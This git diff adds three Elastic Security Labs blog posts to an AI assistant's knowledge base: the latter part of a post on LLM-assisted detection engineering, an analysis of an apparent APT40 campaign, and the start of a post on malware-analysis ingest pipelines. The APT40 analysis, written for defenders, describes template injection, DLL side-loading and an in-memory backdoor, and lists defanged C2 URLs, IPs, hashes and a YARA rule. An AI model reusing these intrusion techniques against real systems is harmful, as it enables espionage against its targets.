+In line with our [Openness Initiative](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security), we remain committed to transparency and want to share how our internal AI R&D efforts have increased the productivity of our threat detection team. For the past few months, Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities. 
+
+## The ONWeek Exploration Odyssey
+
+At Elastic, outside of our long-running [Space, Time](https://www.elastic.co/about/our-source-code) tradition, we dedicate a week every 6 months to work either independently or in a team on something we call ONWeek. This is a week where we all step away from feature work, tech debt, and other similar tasks; and use the week to focus on innovative ideas, active learning opportunities, applied research, and proof of concept work. During the previous ONWeek in May, we explored ideas to leverage large language models (LLMs) with Elastic’s existing features to enhance security alert triaging and productivity for tier 1 analysts and on, internal productivity workflows, and understanding the foundational building blocks for our experimentation and tuning. Figure 1 shows several different opportunities for research we have, which involve ingesting events, passing data through tailored prompts, and generating different classes of content designed for different Elastic workflows. 
+
+![Figure 1: GenAI Security Use Cases](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image1.jpg)
+Figure 1: GenAI Security Use Cases
+
+Fundamentally we explored several traditional ML approaches, but ultimately focused on starting simple and gradually increasing complexity, while keeping in mind these tools and concepts:
+ - **Start Simple** - A mantra that guided our approach.
+ - **Azure OpenAI** -  Access to the GPT-4 LLM
+ - **Prompt Engineering** - Developing tailored instructions for the LLM.
+ - **LangChain** - Python library to help craft LLM applications.
+
+One of our goals is to streamline Elastic’s detection engineer workflows, allowing for greater focus on better detections while showcasing the depth and nuances of our query languages. On the way there, we’re spending time experimenting to validate our prompts and prepare them for operational use. We want to make sure that as we iterate over our prompts, we don’t incidentally introduce regressions. As AI advancements emerge, we intend for our T&E to ensure that any adjustments, be it fine-tuning, model replacements, or prompt modifications, are deliberate. Ultimately, we aspire for our analysts to seamlessly utilize the latest AIML features, applying the most suitable prompts or ML techniques in the right context.
+
+With these goals in mind, our first research use case in May focused on query generation. We learned quickly that with minimal data and prompt engineering, we could chain a series of prompts to transform raw Elastic events into EQL queries.  
+
+![Figure 2: Query Generation POC](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image44.gif)
+Figure 2: Query Generation POC
+
+For experimentation purposes, we simulated suspicious activity using our [Red Team Automation (RTA)](https://github.com/elastic/detection-rules/tree/main/rta) scripts and captured the endpoint activity in the SIEM through the Elastic Agent.  Figure 2 displays sample events from the Elastic stack, exported to gold.json test files, that included the essential event fields for query generation. 
+
+We then asked GPT to analyze the event collection covering the RTA execution time window and focus on events with suspicious behavior. In our POC, the prompt asked us to pinpoint key values linked to potential anomalies. We then followed with subsequent prompts to chunk the events and summarize all of the activity. Based on all the summaries, we asked GPT to generate a list of indicators, without keying on specific values. With this short list of suspicious behaviors, we then asked GPT to generate the query. A significant advantage of our long-term open-source development is that GPT-related models are familiar with Elastic content, and so we benefited by not having to overfit our prompts.
+
+Even though going from raw data to an EQL query was conceptually straightforward, we still encountered minor hiccups like service availability with Azure OpenAI. It was relatively cheap, in what we estimated cost us around $160 in a week to use the OpenAI and Azure OpenAI inference and embedding APIs. We also explored using the GCP Vertex AI Workbench to facilitate collaborative work on Jupyter notebooks, but the complexity of using the available open source (OSS) models made them challenging to use during the short ONWeek.
+
+![Figure 3: May 2023 ONWeek Major Outcomes](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image2.png)
+Figure 3: May 2023 ONWeek Major Outcomes
+
+We used ONWeek to mature our roadmap like expanding beyond in-memory, library-based vector search implementations to more performant, scalable, and production-ready data stores of our detection-rules content in Elasticsearch. Based on our initial results, we understood the potential and viability of integrating GenAI into the analyst workflow (e.g. allowing event time-window selection, query generation, and timeline addition). Based on these early wins, we put on our internal roadmap plans to pursue further LLM R&D and decided to tackle one of our internal productivity workflows.
+
+## A New Horizon: Generating Investigation Guides
+
+Over the years, Elastic Security Labs has matured its content. Starting in 2020 by adding the Investigation Guide Security feature, then standardizing those guides in 2021. By 2023, with over 900 [rules](https://github.com/elastic/detection-rules/tree/main/rules) in place, we are actively seeking an efficient way to generate highly accurate, detailed, and standardized guides for all 900+ pre-built rules.
+
+Melding traditional ML approaches (like similarity vector search) with our prompt engineering special sauce, our team created a new prototype centered around investigation guide generation called Rulecraft. Now, with just a rule ID in hand, our rule authors can generate a baseline investigation guide solution in mere minutes! 
+
+![Figure 4: Sample Investigation Guide](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image3.png)
+Figure 4: Sample Investigation Guide
+
+In this initial exploration, we supplied detection rules, but limited input to a few fields from the rules like the description and name of GPT. We also attempted to supply the query, but it appeared to overfit the expected outcome we desired. Initially, we provided a simple prompt with these fields to evaluate how well GPT could generate a decent investigation guide with minimal effort. As we explored further, it became evident that we could benefit from chaining multiple prompts akin to what we did during the EQL query generation experiment. So we spent time creating prompts tailored to distinct sections of the investigation guide. Segmenting the prompts not only granted us greater flexibility but also addressed areas where GPT faltered, such as the "Related Rules" section, where GPT tended to hallucinate most. At times like this, we used traditional ML methods like similarity search and integrated our rules into a vector database for enhanced context.
+
+Next, we identified opportunities to inject additional context into specific sections. To ensure uniformity across our guides, we curated a library of approved content and language for each segment. This library then guided GPT in generating and formatting responses similar to our established standard messages. We then compared GenAI-produced guides with their manually crafted counterparts to identify other formatting discrepancies, general errors introduced by GPT, and even broader issues with our prompts. 
+
+Based on these findings, we chose to improve our generated content by adjusting the prompts instead of using post-processing techniques like string formatting. While the automated investigation guides aren't perfect, they offer our detection engineers a solid starting place. In the past, investigation guides have enhanced our PR peer review process by providing the reviewer with more context as the rules expected behavior. We now can generate the base guide, tune it, and add more detail as needed by the detection engineer instead of starting from scratch.  
+
+To bring this capability directly to our detection engineers, we integrated Rulecraft into a GitHub action workflow, so they can generate guides on-demand. We also produced the additional 650+ guides in a mere 13 hours—a task that would traditionally span months. The automation allows us to make small tweaks and quickly regenerate base content for rules missing investigation guides. Again, these guides are still subject to our stringent internal review, but the time and effort saved by leveraging GenAI for our preliminary drafts is incredible. 
+
+## Charting the Future: Next Steps 
+
+Our research and development journey continues, with a central focus on refining our approach to content generation with LLMs and more thoroughly validating our results. Here’s a short list of our priorities now that we’ve explored the viability and efficacy of integrating LLMs into our detection engineering workflow: 
+ - Compare proprietary models with the latest open-source models
+ - Further refine our experimentation process including event filtering, prompt optimization, and exploring various model parameters
+ - Create a test suite to validate our results and prevent regressions.
+ - Seamlessly integrate our R&D advancements into the [Elastic AI Assistant](https://www.elastic.co/blog/open-security-impact-elastic-ai-assistant).
+
+Overall, we want to dramatically increase our investigation guide coverage and reduce the time taken to craft these guides from the ground up. Each investigation guide provides analysts with detailed, step-by-step instructions and queries for triaging alerts. With a customer-first mentality at the forefront of our [source code](https://www.elastic.co/about/our-source-code), we aim to elevate the analyst experience with more investigation guides of even higher quality, translating into less time spent by our customers on FP analysis and alert triaging.
+
+## Summary
+Keeping in spirit with our open innovation and transparency, Elastic Security Labs has begun our generative AI voyage to enhance the productivity of our threat detection processes. Our efforts continue to evolve and incorporate prompt engineering and traditional ML approaches on a case-by-case basis, resulting in more R&D proof-of-concepts like “LetmeaskGPT” and "Rulecraft". The latter POC has significantly reduced the time required to craft baseline guides, improve the analyst experience, and reduce false positive analyses. There’s so much more to do and we want to include you on our journey! While we've made strides, our next steps include further refinement, developing a framework to rigorously validate our results, and exploring opportunities to operationalize our R&D, ensuring we remain at the forefront of security advancements. 
+
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!
+
+Also, feel free to check out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst: 
+ - Learn how to responsibly use [ChatGPT with Elasticsearch](https://www.elastic.co/blog/chatgpt-elasticsearch-openai-meets-private-data)
+ - See the new Elastic [AI Assistant](https://www.elastic.co/blog/introducing-elastic-ai-assistant) — the open, generative AI sidekick powered by ESRE and [get setup](https://www.elastic.co/guide/en/security/current/security-assistant.html#set-up-ai-assistant)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md
new file mode 100644
index 0000000000000..0c24f667d04e6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/advanced_techniques_used_in_malaysian_focused_apt_campaign.md
@@ -0,0 +1,238 @@
+---
+title: "A close look at the advanced techniques used in a Malaysian-focused APT campaign"
+slug: "advanced-techniques-used-in-malaysian-focused-apt-campaign"
+date: "2022-06-22"
+description: "Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise."
+author:
+  - slug: samir-bousseaden
+  - slug: daniel-stepanic
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-castle-tower.jpg"
+category:
+  - slug: campaigns
+---
+
+The Elastic Security Intelligence & Analytics Team researches adversary innovations of many kinds, and has recently focused on an activity group that leveraged remote templates, VBA code evasion, and DLL side-loading techniques. Based on code similarity and shared tactics, techniques, and procedures (TTPs), the team assessed this activity to be possibly linked to a Chinese-based group known as APT40, or Leviathan. The group’s campaign appears to target Malaysian government officials with a lure regarding the 2020 Malaysian political crisis.
+
+## Anatomy of the attack
+
+![Figure 1: Original image](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/1-leviathan-apt-blog-original-image.jpg)
+
+![Figure 2: Lure document image](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/2-leviathan-apt-blog-lure-document-image.jpg)
+
+To initiate their advanced persistent threat (APT) campaign, the group likely delivered a Microsoft Word document as a phishing lure attachment. The image used in the lure (Figure 2) appears to be crafted from a broadcast announcement shared by a Malaysian blogger (Figure 1). The lure image includes the same broadcast time, but the date and speech topic are removed. Once this attachment is opened, a decoy document is presented while behind the scenes, taking the following actions:
+
+- The lure document downloads the remote template RemoteLoad.dotm
+- The remote template executes VBA macro code
+- The VBA macro code unpacks and executes two embedded base64-encoded DLLs (sl1.tmp and sl2.tmp) to c:\users\public\
+
+This technique is known as template injection, which you may recall from our [Playing defense against Gamaredon Group blog post](https://www.elastic.co/blog/playing-defense-against-gamaredon-group). This an effective approach used by adversaries to bypass perimeter controls such as email gateways.
+
+![Figure 4: Obfuscation of MZ/PE header base64](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/4-leviathan-apt-blog-obfuscation.jpg)
+
+Both embedded DLLs (sl1.tmp and sl2.tmp) are similar and export the same function names: RCT and RCP. The first DLL (sl1.tmp) is used to download a benign executable called LogiMailApp.exe and an associated library LogiMail.dll, and the second DLL (sl2.tmp) is used to execute LogiMailApp.exe, which automatically attempts to execute LogiMail.dll due to an inherent DLL search order vulnerability we’ll cover shortly.
+
+|                 |           |              |                                  |                           |
+| --------------- | --------- | ------------ | -------------------------------- | ------------------------- |
+| File name       | File type | Size (bytes) | MD5                              | Compile time              |
+| LogiMailApp.exe | Win32 EXE | 311656       | 850a163ce1f9cff0367854038d8cfa7e | 2012-09-26 22:13:13+00:00 |
+| LogiMail.dll    | Win32 DLL | 105984       | b5a5dc78fb392fae927e9461888f354d | 2020-06-03 04:08:29+00:00 |
+| sl1.tmp         | Win32 DLL | 3072         | ccbdda7217ba439dfb6bbc6c3bd594f8 | 2019-11-29 17:15:29+00:00 |
+| sl2.tmp         | Win32 DLL | 3072         | dbfa006d64f39cde78b0efda1373309c | 2019-11-29 21:23:44+00:00 |
+
+_Table 1: Dropped files metadata_
+
+![Figure 5: Download and execution of LogiMailApp.exe and LogiMail.dll](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/5-leviathan-apt-blog-download-execution.jpg)
+
+This implementation stood out to our researchers due to a behavioral idiosyncrasy:
+
+- The Microsoft Office application winword.exe loads sl1.tmp and sl2.tmp DLLs uses the LoadLibraryA method, which is moderately rare
+- These DLLs run explicit commands or install a payload from a URL using the CallWindowProcA method, which appears to be exceptionally rare
+- Both DLLs are deleted after execution
+
+![Figure 6: Download and execution module deletion](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/6-leviathan-apt-blog-module.jpg)
+
+## Embedded DLLs
+
+The embedded DLLs, sl1.tmp and sl2.tmp, have very limited functionality — exporting the RCP and RCT functions. The RCP function implements the WinExec method to execute commands where the RCT function uses the URLDownloadToFileA method to download a file from a specified URL.
+
+![Figure 7: Exported functions – RCP and RCT](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/7-leviathan-apt-blog-exported-functions.jpg)
+
+## DLL side-loading a backdoor
+
+LogiMailApp.exe, which is downloaded by sl1.tmp and executed by sl2.tmp, is vulnerable to a form of DLL search-order hijacking called side-loading, which automatically searches for and executes LogiMail.dll if found in the same directory. Forms of DLL search-order hijacking can be used with many third-party software applications. In this case, search-order hijacking was used to load a backdoor that exports the following notable functions:
+
+![Figure 8: LogiMail.dll exports table](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/8-leviathan-apt-blog-logimail-exports.jpg)
+
+![Figure 9: LogiMailApp.exe – Logitech camera software](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/9-leviathan-apt-blog-logitech-software.jpg)
+
+![Figure 10: LogiMail.dll side-loading](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/10-leviathan-apt-blog-side-loading.jpg)
+
+The adversary-created binary LogiMail.dll exports the function DllGetClassObject that contains critical logic for the execution flow of this sample:
+
+1. Download an AES-encrypted second stage object to %TEMP%\~liseces1.pcs
+2. Derive a 128-bit AES key and initialization vector from SHA256 of a hardcoded string
+3. Read and decrypt %TEMP%\~liseces1.pcs in memory using the ReadFile and CryptDecrypt functions
+4. Delete %TEMP%\~liseces1.pcs from disk
+
+![Figure 11: Encrypted URL and hardcoded key](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/11-leviathan-apt-blog-encrypted-url.jpg)
+
+![Figure 12: Decrypted second stage URL and temp staging file](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/12-leviathan-apt-blog-decrypted-second-stage.jpg)
+
+![Figure 13: Second stage download, in-memory decryption, execution, and file deletion](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/13-leviathan-apt-blog-second-stage-download.jpg)
+
+## Second stage backdoor
+
+The decrypted second stage backdoor is mapped into memory and then its original entry point (OEP) is called, thus bypassing successful detections based on file system scanning.
+
+![Figure 14: LogiMail.dll — Resolving needed functions to map second stage PE into memory](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/14-leviathan-apt-blog-resolving-needed-functions.jpg)
+
+![Figure 15: The second stage implant mapped in LogiMailApp.exe memory](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/15-leviathan-apt-blog-second-stage-mapped.jpg)
+
+Both the payload staging server and the second stage infrastructure use dynamic DNS:
+
+![Figure 16: C2 HTTP POST request to /postlogin](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/16-leviathan-apt-blog-c2.jpg)
+
+This payload supports the following capabilities:
+
+- Basic anti-debug checks
+- System and user discovery
+- Execution via command line
+- File discovery, upload, and download
+- Persistence via run registry
+- Encrypt C2 traffic using same AES key
+
+![Figure 17: System and user discovery](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/17-leviathan-apt-blog-system-discovery.jpg)
+
+![Figure 18: Execution via command-line](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/18-leviathan-apt-blog-execution-command-line.jpg)
+
+![Figure 19: File discovery, upload, and download](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/19-leviathan-apt-blog-file-discovery.jpg)
+
+## Possible APT40/Leviathan connection
+
+Earlier in the year, the Malaysian Computer Emergency Response Team (MyCERT) issued an [advisory](https://www.mycert.org.my/portal/advisory?id=MA-774.022020) related to espionage activity targeting their country. The report listed different TTPs and included multiple samples and other technical indicators that align with a threat group known as APT40/Leviathan.
+
+At a high level, this sample follows the continued trend of targeting Malaysian victims using specific TTPs such as remote templates, employing macros, using DLL side-loading techniques, and leveraging an in-memory implant with dynamic DNS for command and control. More specifically, the second stage implant from this lure shares unique strings and URL references and contains similar functionality that correlates with the previous reporting for APT40/Leviathan. With these similarities, our Intelligence & Analytics Team assesses with moderate confidence that this activity is linked to APT40/Leviathan.
+
+Implant String Similarities with MyCERT Sample:
+
+- /list_direction
+- /post_document
+- /post_login
+- Open Remote File %s Failed For: %s
+- Open Pipe Failed %s
+- Download Read Path Failed %s
+- %02X-%02X-%02X-%02X-%02X-%02X
+- Software\Microsoft\Windows\CurrentVersion\Run
+- ntkd
+
+![](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/20-leviathan-apt-blog-shared-strings.jpg)
+
+![Figure 20: Shared strings with MyCERT sample - 8a133a382499e08811dceadcbe07](/assets/images/advanced-techniques-used-in-malaysian-focused-apt-campaign/21-leviathan-apt-blog-shared-strings-2.jpg)
+
+## Conclusion
+
+In this post, we highlighted a recent sample that most likely represents the work of a highly organized adversary. Activity groups like this are significant for everyone to take notice of, if only because they represent a higher maturity level of post-exploit innovation. Their cutting edge TTPs today end up being everyone’s run of the mill tomorrow; it’s important to learn from these events.
+
+We hope that by sharing some of these insights, we can help raise awareness and continue to focus on protecting the world's data from attack. To enable organizations further, we’ve added all the observed MITRE ATT&CK® techniques and indicators of compromise (IoCs) below.
+
+### MITRE ATT&CK® techniques
+
+- [T1193 - Spearphishing Attachment](https://attack.mitre.org/techniques/T1193/)
+- [T1221 - Template Injection](https://attack.mitre.org/techniques/T1221/)
+- [T1060 - Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1060/)
+- [T1073 - DLL Side-Loading](https://attack.mitre.org/techniques/T1073/)
+- [T1129 - Execution through Module Load](https://attack.mitre.org/techniques/T1129/)
+- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)
+- [T1107 - File Deletion](https://attack.mitre.org/techniques/T1107/)
+- [T1140 - Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)
+- [T1059 - Command-Line Interface](https://attack.mitre.org/techniques/T1059/)
+
+### Indicators of Compromise (IOCs)
+
+#### File names and paths
+
+```
+Bubar Parlimen.zip
+Bubar Parlimen.docx
+RemoteLoad.dotm
+C:\Users\Public\sl1.tmp
+C:\Users\Public\sl2.tmp
+C:\Users\*\AppData\Local\Temp\~liseces1.pcs
+C:\Users\*\AppData\Local\Microsoft\Office\LogiMailApp.exe
+C:\Users\*\AppData\Local\Microsoft\Office\LogiMail.dll
+```
+
+#### Registry keys
+
+```
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ntkd
+```
+
+#### URLs
+
+```
+hxxps[:]//armybar[.]hopto[.]org/LogiMail.dll
+hxxps[:]//armybar[.]hopto[.]org/LogiMailApp[.]exe
+hxxps[:]//armybar[.]hopto[.]org/Encrypted
+hxxp[:]//tomema.myddns[.]me/postlogin
+hxxp[:]//tomema[.]myddns[.]me/list_direction
+hxxp[:]//tomema[.]myddns[.]me/post_document
+```
+
+#### IPs
+
+```
+104[.]248[.]148[.]156
+139[.]59[.]31[.]188
+```
+
+#### HTTPS certificate
+
+```
+74b5e317527c93539dbaaf84d6a61da92a56012a
+```
+
+#### Hashes
+
+```
+523cbdaf31ddc920e5b6c873f3ab42fb791fb4c9d1f4d9e6a7f174105d4f72a1
+ab541df861c6045a17006969dac074a7d300c0a8edd0a5815c8b871b62ecdda7
+145daf50aefb7beec32556fd011e10c9eaa71e356649edfce4404409c1e8fa30
+93810c5fd9a287d85c182d2ad13e7d30f99df76e55bb40e5bc7a486d259810c8
+925f404b0207055f2a524d9825c48aa511199da95120ed7aafa52d3f7594b0c9
+feca9ad5058bc8571d89c9d5a1eebce09e709cc82954f8dce1564e8cc6750a77
+06a4246be400ad0347e71b3c4ecd607edda59fbf873791d3772ce001f580c1d3
+77ef350639b767ce0a748f94f723a6a88609c67be485b9d8ff8401729b8003d2
+```
+
+### YARA
+
+```
+rule APT_APT40_Implant_June2020 {
+   meta:
+       version = "1.0"
+       author =  "Elastic Security"
+       date_added = "2020-06-19"
+       description = "APT40 second stage implant"
+    strings:
+        $a = "/list_direction" fullword wide
+        $b = "/post_document" fullword wide
+        $c = "/postlogin" fullword wide
+        $d = "Download Read Path Failed %s" fullword ascii
+        $e = "Open Pipe Failed %s" fullword ascii
+        $f = "Open Remote File %s Failed For: %s" fullword ascii
+        $g = "Download Read Path Failed %s" fullword ascii
+        $h = "\\cmd.exe" fullword wide
+    condition:
+        all of them
+}
+```
+
+### References
+
+- [https://www.mycert.org.my/portal/advisory?id=MA-774.022020](https://www.mycert.org.my/portal/advisory?id=MA-774.022020)
+
+- [https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/](https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/)
+- [https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html](https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache](https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md
new file mode 100644
index 0000000000000..4d4c84de5a7c1
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/an_elastic_approach_to_large_scale_dynamic_malware_analysis.md
@@ -0,0 +1,232 @@
+---
+title: "An Elastic approach to large-scale dynamic malware analysis"
+slug: "an-elastic-approach-to-large-scale-dynamic-malware-analysis"
+date: "2023-07-31"
+description: "This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework."
+author:
+- slug: ruben-groenewoud
+- slug: remco-sprooten
+image: "blog-thumb-steel-engine.jpg"
+category:
+---
+## Introduction
+
+In previous publications, we have written about Detonate: how we built it and how we use it within Elastic for malware analysis. This publication delves deeper into using Detonate for dynamic large-scale malware analysis.
+
+At a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. For more information about Detonate, check out [Click, Click… Boom! Automating Protections Testing with Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate).
+
+A significant portion of the data generated during execution consists of benign and duplicate information. When conducting dynamic malware analysis on a large scale, managing the vast amount of low-value data is a considerable challenge. To address it, we took advantage of several Elastic ingest pipelines, which we leveraged to effectively filter out noise from our datasets. This application of ingest pipelines enabled us to conveniently analyze our large volumes of malware data and identify several malicious behaviors that we were already interested in.
+
+This research examines the concept of ingest pipelines, exploring their different types and applications, and how to implement them. We will then walk through a comprehensive workflow incorporating these ingest pipelines. We will discuss our scripts and the methods that we created in order to automate the entire process. Finally, we will present our results and discuss how the workflow shared in this publication can be leveraged by others to obtain similar outcomes.
+
+### Overview
+
+In order to accomplish our large-scale malware analysis goals, we required effective data management. An overview of the chained ingest pipelines and processors that we built is shown below:
+
+![Ingest pipeline process overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image1.png)
+
+In summary, we fingerprint known good binaries and store those fingerprints in an enrich index. We do the same thing when we detonate malware or an unknown binary, using a comparison of those fingerprints to quickly filter out low-value data.
+
+### Ingest pipelines
+
+[Ingest pipelines](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html) are a powerful feature that allows you to preprocess and transform data before indexing it into Elasticsearch. They provide a way to perform various actions on incoming documents, such as enriching the data, modifying fields, extracting information, or applying data normalization. Ingest pipelines can be customized to meet specific data processing requirements. Our objective was to create a pipeline that differentiates known benign documents from a dataset containing both benign and malicious records. We ingested large benign and malicious datasets into separate namespaces and built pipelines to normalize the data, calculate fingerprints, and add a specific label based on certain criteria. This label helps differentiate between known benign and unknown data.
+
+### Normalization
+
+Normalization is the process of organizing and transforming data into a consistent and standardized format. When dealing with lots of different data, normalization becomes important to ensure consistency, improve search and analysis capabilities, and enable efficient data processing.
+
+The goal is to make sure documents with unique identifiers are no longer unique. For example, we remove the unique 6-character filename of the Elastic Agent in the " `/opt/Elastic/Agent/data/`" directory after installation. This ensures data from different Elastic Agents can be fully comparable, leading to more filtering opportunities in later pipeline phases.
+
+To accomplish this, we leveraged the [gsub pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/gsub-processor.html). It allowed us to apply regex-based transformations to fields within the data pipeline. We performed pattern matching and substitution operations to normalize event data, such as removing special characters, converting text to lowercase, or replacing certain patterns with standardized values.
+
+By analyzing our dataset, we discovered a set of candidates that would require normalization, and created a simple Python script to generate a list of gsub processors based on the matching value and the replacement value. The script that we leveraged can be found on [GitHub](https://github.com/elastic/labs-releases/tree/main/tools/malware_research). Using the output of the script, we can leverage dev tools to create a pipeline containing the generated gsub processors.
+
+Prior to utilizing the normalization pipeline, documents would contain random 6 character strings for every single Elastic agent. An example is displayed below.
+
+![Document before normalization](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image6.png)
+
+After ingesting and manipulating the documents through the normalization pipeline, the result looks like the following.
+
+![Document after normalization](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image13.png)
+
+When all documents are normalized, we can continue with the fingerprint calculation process.
+
+### Fingerprint calculation
+
+Fingerprint calculations are commonly used to generate a unique identifier for documents based on their content. The [fingerprint ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/fingerprint-processor.html) provides a convenient way to generate such identifiers by computing a hash value based on the specified fields and options, allowing for efficient document deduplication and comparison. The pipeline offers various options, including algorithms (such as MD5 or SHA-1), target fields for storing the generated fingerprints, and the ability to include or exclude specific fields in the calculation.
+
+We needed to calculate the fingerprints of documents ingested into Elasticsearch from several sources and integrations such as endpoint, [auditd manager](https://docs.elastic.co/integrations/auditd_manager), packetbeat, [file integrity monitoring](https://docs.elastic.co/integrations/fim) etc. To calculate the fingerprints, we first needed to specify which fields we wanted to calculate them for. Because different data sources use different fields, it was important to create separate processors for each data type. For our use case, we ended up creating a different fingerprint processor for the following set of event categories:
+
+![Gsub ingest processor](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image20.jpg)
+
+By specifying a condition we ensure that each processor only runs on its corresponding dataset.
+
+![Event filter example](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image21.jpg)
+
+The included fields to these processors are of the utmost importance, as they can indicate if a field is less static than expected or if an empty field could result in a non-functional pipeline. For example, when working with network data, it might initially make sense to include protocol, destination ip, destination port, source ip and source port. But this will lead to too much noise in the pipeline, as the socket that is opened on a system will be opened on an ephemeral source port, which will result in many unique fingerprints for otherwise identical network traffic. Some fields that may be subject to change relate to file sizes, version numbers, or specific text fields that are not being parsed. Normalization sometimes preserves fields that aren't useful for fingerprinting, and the more specific the fingerprint the less useful it tends to be. Fingerprinting by file hash illustrates this, while adding an empty space to the file causes a new hash to be calculated, this would break an existing hash-based fingerprint of the file.
+
+Field selection is a tedious process but vital for good results. For a specific integration, like auditd manager, we can find the [exported fields](https://github.com/elastic/integrations/tree/main/packages/auditd_manager) on [GitHub](https://github.com/elastic/integrations/tree/main/packages) and pick the ones that seem useful for our purposes. An example of the processor that we used for `auditd\_manager` can be found in the image below.
+
+![Example of the event's fingerprint fields used for the calculation.](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image12.png)
+
+### Enrichment process
+
+The [enrich ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html) is used for enriching incoming documents with additional information from external data sources. It allows you to enrich your data by performing lookups against an index or data set, based on specific criteria. Common use cases for the enrich ingest pipeline include augmenting documents with data from reference datasets (such as geolocation or customer information) and enriching logs with contextual information (like threat intelligence labels).
+
+For this project we leveraged enrich pipelines to add a unique identifier to the ingested document if it met certain criteria described within an enrich policy. To accomplish this, we first ingested a large and representative batch of benign data using a combination of normalization and fingerprint calculation pipelines. When the ingestion was completed, we set up several [enrich policies](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest-enriching-data.html) through the [execute enrich policy API](https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html). The execution of these enrich policies will create a set of new .enrich-\* system indices. The results stored within these indices will later be used by the pipelines used to ingest mixed (benign and malicious) data.
+
+This will make more sense with an example workflow. To leverage the enrich ingest pipeline, we first need to create enrich policies. As we are dealing with different data sources - meaning network data looks very different from auditd manager data - we will have to create one enrich policy per data type. In our enrich policy we may use a query to specify which documents we want to include in our enrich index and which ones we want to exclude. An example enrich policy that should add all auditd manager data to the enrich index, other than the data matching three specific match phrases, is displayed below.
+
+![Creation of the enrich policy](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image14.jpg)
+
+We are leveraging the “fingerprint” field which is calculated in the fingerprint processor as our match field. This will create an index filled with benign fingerprints to be used as the enriching index within the enrich pipeline.
+
+After creating this policy, we have to execute it for it to read the matching index, read the matching field, query for inclusions and exclusions, and create the new .enrich-\* system index. We do this by executing a POST request to the \_execute API.
+
+![Example API request to execute the enrich policy](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image18.jpg)
+
+We set wait_for_completion=false to make sure that the policy doesn’t time out. This might occur if the dataset is too large. When we navigate to index management and include hidden indices, we can see that the index is created successfully.
+
+![The newly created enrich-* system index](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image16.jpg)
+
